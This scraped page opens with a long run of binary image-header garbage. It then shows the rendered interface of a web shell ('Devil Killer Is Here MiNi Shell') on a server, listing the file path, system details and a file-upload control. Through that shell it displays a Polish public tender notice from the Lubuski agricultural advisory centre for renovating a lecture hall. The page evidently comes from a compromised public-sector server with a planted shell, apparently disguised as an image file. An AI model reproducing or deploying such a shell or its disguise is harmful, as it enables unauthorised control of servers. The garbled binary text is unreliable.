JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241120/0060658401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja sali wykładowej nr 42/43 wraz z zakupem wyposażenia </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">LUBUSKI OŚRODEK DORADZTWA ROLNICZEGO</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">LODR</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001059001</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">91</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kalsk</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">66-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">68 385 2091</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@lodr.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.lodr.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa jednostka organizacyjna posiadająca osobowość prawną </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Rolnicza </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja sali wykładowej nr 42/43 wraz z zakupem wyposażenia </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a9d78b79-5b2d-4993-a3cb-e26bb5c76e57</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00606584</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lodr <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lodr</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje o środkach komunikacji elektronicznej, przy użyciu, których zamawiający będzie komunikował się z wykonawcami oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej<br/> 1. Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem Platformy zakupowej.<br/> 2. Komunikacja między zamawiającymi a wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje,<br/> przekazywane powinny być z pośrednictwem Platformy zakupowej formularza „Wyślij wiadomość do zamawiającego”.<br/> 3. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuję się datę ich przesłania za<br/> pośrednictwem Platformy zakupowej poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego”, po których pojawi się<br/> komunikat, że wiadomość została wysłana do zamawiającego.<br/> 4. Zamawiający dopuszcza awaryjnie, komunikację z pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby<br/> uprawnionej do kontaktu z Wykonawcami:<br/> w sprawach merytorycznych: k.roslik@lodr.pl<br/> w sprawach proceduralnych: e.karpowicz@lodr.pl<br/> 5. Komunikacja ustna dopuszczalna jest tylko w odniesieniu do informacji, które nie są istotne, w szczególności nie dotyczą ogłoszenia o zamówieniu lub dokumentów zamówienia oraz ofert, o ile jej treść jest udokumentowana.<br/> 6. Zamawiający będzie przekazywał wykonawcom informacje w formie elektronicznej za pośrednictwem Platformy zakupowej.<br/> Informacje, zawiadomienia, zmiany, odpowiedzi – z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana w formie elektronicznej za pośrednictwem Platformy zakupowej do konkretnego wykonawcy.<br/> 7. Wykonawca, jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na Platformie zakupowej przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/> W pozostałym zakresie obowiązują zapisy SWZ i ustawy Pzp</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/lodr</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/> 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/> swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/> L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>Administratorem Pani/Pana danych osobowych jest Lubuski Ośrodek Doradztwa Rolniczego z siedzibą w Kalsku, Kalsk 91, 66<br/>100 Sulechów, tel.: 68 385 20 91, e-mail: sekretariat@lodr.pl;<br/> Lubuski Ośrodek Doradztwa Rolniczego (w skrócie LODR) wyznaczył Inspektora ochrony danych osobowych, z którym można<br/> kontaktować się w sprawach związanych Pani/Pana danymi osobowymi; dane kontaktowe, adres e-mail: 68 385 20 91 wew. 341, tel.<br/> kom. 513 978 936, lub poprzez e-mail: iod@lodr.pl;<br/> Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/> udzielenie zamówienia publicznego.<br/> Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/> na podstawie przepisów prawa, w tym na podstawie ustawy o dostępie do informacji publicznej z dnia 26.09.2001 r.; <br/>Pani/Pana dane osobowe będą przechowywane przez okres 5 lat od dnia zakończenia postępowania o udzielenie zamówienia;<br/> Obowiązek podania przez Panią/Pana danych osobowych, bezpośrednio Pani/Pana dotyczących, jest związany z udziałem w<br/> postępowaniu o udzielenie zamówienia publicznego; <br/>W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/> 22 RODO;<br/> Posiada Pani/Pan:<br/> • na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/> • na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych*;<br/> • na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/> przypadków, o których mowa w art. 18 ust. 2 RODO **; <br/>• prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/> osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu:<br/> − w związku z art.17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/> − prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/> − na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/> Pani/Pana danych osobowych jest art. 6 ust. 1 lit. b i c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AGK.210.6.2024.KR</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem inwestycji są roboty budowlane polegające na modernizacji sali wykładowej budynku Lubuskiego Ośrodka<br/> Doradztwa Rolniczego w Kalsku, w zakresie części konferencyjnej obiektu. <br/>Będzie on obejmował: <br/>W zakresie architektoniczno-budowlanym: <br/>− Prace rozbiórkowo-budowlane,<br/> − Remont podłogi na sali wykładowej, <br/>− Remont ścian i słupów wewnętrznych na sali wykładowej oraz holu głównym (tynkowanie, malowanie), <br/>− Montaż nowego sufitu podwieszanego na sali konferencyjnej 42/43, <br/>− Wyposażenie sali konferencyjnej 42/43 w elementy aranżacji wnętrz, − Prace towarzyszące: • Montaż systemu<br/> nagłośnienia w sali konferencyjnej 42/43, <br/>W zakresie instalacji sanitarnych: <br/>− Demontaż istniejących grzejników żeliwnych, zaworów grzejnikowych, rur grzewczych, instalacja nowych stalowych<br/> grzejników dwupłytowych, zaworów grzejnikowych, rur grzewczych (zamaskowanych w podłodze lub ścianie), elementów<br/> instalacji grzewczej − Płukanie instalacji c.o., <br/>− Wykonanie próby szczelności, <br/>− Sprawdzenie działania wykonanej instalacji c.o. <br/>− Przeniesienie istniejącego systemu wentylacji grawitacyjnej ze ściany w nowo wykonany sufit na sali wykładowej nr 42/43,<br/> − Przeniesienie instalacji klimatyzacji względem wysokości nowego sufitu podwieszanego (zachowanie istniejącej) na sali<br/> wykładowej nr 42/43, <br/>− Demontaż i ponowny montaż (po rozbiórce okładzin drewnianych) istniejącego systemu wentylacji grawitacyjnej w holu<br/> głównym, <br/>− Wykonanie otworów wentylacyjnych w ścianie okiennej, <br/>− Doprowadzenie węzła instalacji wodociągowej i kanalizacyjnej do umywalki w sali wykładowej nr 42/43. <br/>W zakresie instalacji elektrycznych:<br/> − Demontaż przewodów wtynkowych,<br/> − Wykucie bruzd dla rur montażowych,<br/> − Wymiana istniejących przewodów elektrycznych na nowe, <br/>− Demontaż starych i montaż nowych puszek wtynkowych, gniazd wtyczkowych, włączników, elementów instalacji<br/> elektrycznej,<br/> − Montaż opraw oświetleniowych typu LED z możliwością sterowania natężenia w wykonanym suficie,<br/> − Badanie skuteczności zerowania,<br/> − Montaż szafy typu RACK, <br/>− Sprawdzenie i pomiar wykonanego obwodu elektrycznego, − Sprawdzenie działania wyłącznika różnicowego,<br/> − Pomiar natężenia oświetlenia. <br/>W zakresie niskoprądowej instalacji komputerowej:<br/> − Montaż przyściennych rozdzielnic, szaf, pulpitów, tablic przekaźnikowych i nastawczych, <br/>− Montaż przewodów internetowych w gotowych korytkach,<br/> − Montaż elementów instalacji Wi-Fi, <br/>− Pomiar skuteczności łącza transmisyjnego. <br/>W zakresie niskoprądowej instalacji nagłośnienia:<br/> − Wykonanie okablowania dla urządzeń teletransmisyjnych <br/> − Wykonanie okablowania dla obwodów zasilających<br/> − Uruchomienie i pomiar skuteczności wykonanych łączy <br/>− Montaż instalacji nagłośnieniowej sali (m.in. kolumn naściennych, wzmacniacza, mixera audio-video, zestawu mikrofonów,<br/> kamery do video-konferencji, projektora ściennego itp.) Zagospodarowanie terenu bez zmian.<br/> Prace wykonywane będą na czynnym obiekcie i nie mogą powodować uciążliwości dla innych części obiektu nie objętych<br/> robotami. Sposób organizacji robót zostanie uzgodniony z Zamawiającym. <br/>2. Szczegółowy opis przedmiotu zamówienia, opis wymagań zamawiającego w zakresie realizacji i odbioru określają:<br/> Załącznik nr 1 – Projekt budowlany zawierający:<br/> Załącznik nr 1a – Projekt techniczny<br/> Załącznik nr 1b – Projekt zagospodarowania terenu. Projekt architektoniczno-budowlany<br/> Załącznik nr 1c – Rysunki i schematy<br/> Załącznik nr 2 – Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych <br/>Załącznik nr 3 – Propozycja elementów wyposażenia wnętrz<br/> Załącznik nr 4 – Przedmiar robót ( pomocniczo )<br/> Załącznik nr 5 - Opis Przedmiotu Zamówienia<br/> Załącznik nr 6 - Projekt umowy <br/>Przedmiar robót stanowiący załącznik do SWZ należy traktować jako element dodatkowy, jedynie ułatwiający sporządzenie<br/> oferty. Przedmiary robót nie mogą stanowić jedynej podstawy do wyceny przedmiotu zamówienia. Przedmiary robót mają<br/> charakter pomocniczy, ułatwiający sporządzenie oferty. Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości<br/> robót z dokumentacją projektową. Ewentualny brak jakiejś części zamówienia w przedmiarze robót lub w tabelach,<br/> schematach materiałowych zawartych w dokumentacji projektowej w szczególności w projekcie wykonawczym, nie zwalnia<br/> Wykonawcy z obowiązku ich wykonania na podstawie dokumentacji technicznej bądź OPZ w umownej cenie ryczałtowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45214000-0 - Roboty budowlane w zakresie budowy obiektów budowlanych związanych z edukacją i badaniami</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45111220-6 - Roboty w zakresie usuwania gruzu</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45421130-4 - Instalowanie drzwi i okien</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-20</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i<br/> odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnianie kryteriów.<br/> Numer Nazwa kryterium Maksymalna liczba punktów<br/> 1 Cena oferty brutto 70<br/> 2 Okres gwarancji 30<br/> Kryterium i waga: <br/>Cena oferty brutto ( C ): 70 %<br/> Okres gwarancji ( G ): 30 %<br/> 1.1. Kryterium Cena brutto (C) - oferta z najniższą ceną brutto otrzyma maksymalną liczbę 70 punktów, natomiast pozostałe oferty<br/> uzyskają wartość punktową wyliczoną wg poniższego wzoru:<br/> Cmin<br/> C = x WC<br/> Cb<br/> C - liczba punktów w kryterium Cena brutto<br/> Cmin - najniższa cena ofertowa w zbiorze ofert podlegających ocenie<br/> Cb - cena ofertowa ocenianej oferty<br/> WC - waga kryterium = 70<br/> 1.2. Kryterium Okres gwarancji (G) – ocena w tym kryterium polega na przyznaniu ofercie Wykonawcy dodatkowych punktów (max.<br/> 30 punktów) za udzielenie gwarancji na wykonany zakres robót liczony od daty bezusterkowego odbioru końcowego. <br/>Zaoferowanie okresu gwarancji krótszego ( mniej niż 48 miesięcy ) będzie skutkowało przyznaniem 0 punktów w kryterium: Okres<br/> gwarancji. Wykonawca zobowiązany jest podać okres gwarancji w miesiącach. Punktacja w niniejszym kryterium będzie obliczona<br/> według następujących zasad:<br/> 1) Za przedłużenie minimalnego okresu gwarancji do:<br/> a) 48 miesięcy i więcej – ofercie Wykonawcy zostanie przyznanych 30 punktów,<br/> b) mniej niż 48 miesięcy – ofercie Wykonawcy zostanie przyznanych 0 punktów.<br/> UWAGA: W przypadku, gdy Wykonawca:<br/> 1) poda niejednoznacznie w Formularzu oferty deklarowany okres gwarancji na zakres robót, Zamawiający przyjmie, że<br/> deklarowanym okresem gwarancji będzie okres mniejszy niż 48 miesięcy i w tym kryterium oferta otrzyma 0 pkt;<br/> 2) poda w Formularzu oferty przedłużenie okresu gwarancji na zakres robót o okres dłuższy niż 48 miesięcy, oferta otrzyma<br/> maksymalną liczbę punktów, t.j. otrzyma 30 pkt;<br/> 2. za najkorzystniejszą ofertę, uznana zostanie ta, która uzyska w sumie największą liczbę punktów w oparciu o przyjęte kryteria,<br/> obliczoną wg wzoru:<br/> P = C + G<br/> gdzie:<br/> P – liczba punktów uzyskanych przez ocenianą ofertę<br/> C – liczba punktów uzyskanych przez ocenianą ofertę w kryterium Cena brutto<br/> G – liczba punktów uzyskanych przez ocenianą ofertę w kryterium Okres gwarancji<br/> 3. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do dwóch miejsc po przecinku</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunki udziału w postępowaniu o udzielenie zamówienia<br/> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/> Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego poniższe warunki udziału w postępowaniu. <br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają <br/>4) zdolności technicznej lub zawodowej:<br/> W zakresie wiedzy i doświadczenia: Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie<br/> ostatnich pięciu lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/> wykonał należycie, w szczególności wykonał zgodnie z przepisami prawa budowlanego, oraz prawidłowo i w terminie<br/> ukończył, co najmniej jedną robotę budowlaną polegającą na przebudowie, lub/i rozbudowie, lub/i modernizacji<br/> pomieszczeń w budynkach mieszkalnych lub biurowych, na kwotę nie mniejszą niż 150.000,00 zł brutto ( sto pięćdziesiąt<br/> tysięcy złotych 00/100 ) obejmujące w swoim zakresie prace w specjalności co najmniej: konstrukcyjno – budowlanej,<br/> elektrycznej w zakresie sieci, instalacji i urządzeń: elektrycznych i/lub elektroenergetycznych, składając Wykaz robót<br/> budowlanych - Załącznik nr 10 do SWZ ( wraz z dowodami potwierdzającymi te fakty tj. referencje, listy polecające, umowy i<br/> inne). <br/>Pod pojęciem robota budowlana – należy rozumieć robotę budowlaną wykonaną na podstawie jednej umowy (kontraktu).<br/> Przez roboty budowlane wykonane należy rozumieć:<br/> 1) roboty budowlane rozpoczęte i zakończone w ww. okresie,<br/> 2) roboty budowlane zakończone w ww. okresie, których rozpoczęcie mogło nastąpić wcześniej niż w ww. okresie <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wymaga złożenia: <br/>Załącznika nr 8 – Oświadczenie o niepodleganiu wykluczeniu , <br/>Załącznika nr 11 - Oświadczenie dotyczące przynależności/braku przynależności do grupy kapitałowej, <br/>Załącznika nr 12 - Oświadczenie o aktualności danych<br/> W pozostałym zakresie 